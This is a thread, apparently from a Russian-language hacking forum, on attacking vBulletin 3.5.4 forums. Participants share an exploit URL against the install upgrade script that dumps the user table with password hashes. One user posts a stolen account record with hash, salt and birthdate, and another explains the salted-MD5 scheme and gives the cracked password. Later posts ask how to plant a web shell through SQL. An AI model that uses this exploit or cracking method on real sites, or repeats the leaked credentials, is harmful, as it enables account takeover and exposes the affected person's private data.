Форумы vBulletin 3.5.4

Discussion in 'Уязвимости CMS/форумов' started by Elenberg, 6 Jul 2006.

  1. CtHuLhU

    CtHuLhU New Member

    Joined:
    12 Nov 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    for KruGoZor

    всё так. и от скрипта не зависит.
    как сплойт проще заюзать
    /install/upgradecore.php?do=sqltable&table=user&step[]
    где user - предполагаемое имя таблицы с хэшами юзверей
     
    #41 CtHuLhU, 19 Nov 2006
    Last edited: 19 Nov 2006
  2. KruGoZor

    KruGoZor New Member

    Joined:
    15 Oct 2006
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    круто спасибо!!!
    с меня +))
     
  3. KruGoZor

    KruGoZor New Member

    Joined:
    15 Oct 2006
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    INSERT INTO user VALUES('1','6','','0','LORD ALUCARD','a7e65433b82e964d3c0c0719115b63f8','2006-07-23','','0','','','','','','','','2','1','Древнее Зло','1','1153657920','0','1163931713','1163949280','1163931841','40','10','5','3','0','0','0','0','2135','07-14-1988','1988-07-14','-1','1','','0','0','0','0','-1','21','0','sab');


    плииз поможите ещё сгенерить пароль...или скажите как по шагам)))
    где соль я тоже не могу найти (sab чтоли??)
     
  4. CtHuLhU

    CtHuLhU New Member

    Joined:
    12 Nov 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    хэш: a7e65433b82e964d3c0c0719115b63f8
    соль: sab
    метод шифрования: md5(md5($pass).$salt)
    PHP:

    пароль
    253839
    =)))

    юзал PasswordPro 2.2.1.2
     
    1 person likes this.
  5. И.Г.

    И.Г. Elder - Старейшина

    Joined:
    29 Aug 2006
    Messages:
    336
    Likes Received:
    343
    Reputations:
    111
    Что то никто ничего толком не предложил... Exploit наверно нет... XSS я думаю все нашли... но это гимморойно....
     
  6. Mr_Necromancer

    Joined:
    21 Nov 2006
    Messages:
    25
    Likes Received:
    10
    Reputations:
    -9
    Хэш брутить мона прогой PasswordPro, но если пароль не дико простой, то на это у тебя уйдёт пару десятков лет :)
     
  7. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    А кто нибудь знает как заливать шел,через Sql запрос?
     
  8. И.Г.

    И.Г. Elder - Старейшина

    Joined:
    29 Aug 2006
    Messages:
    336
    Likes Received:
    343
    Reputations:
    111
    чуть конкретней....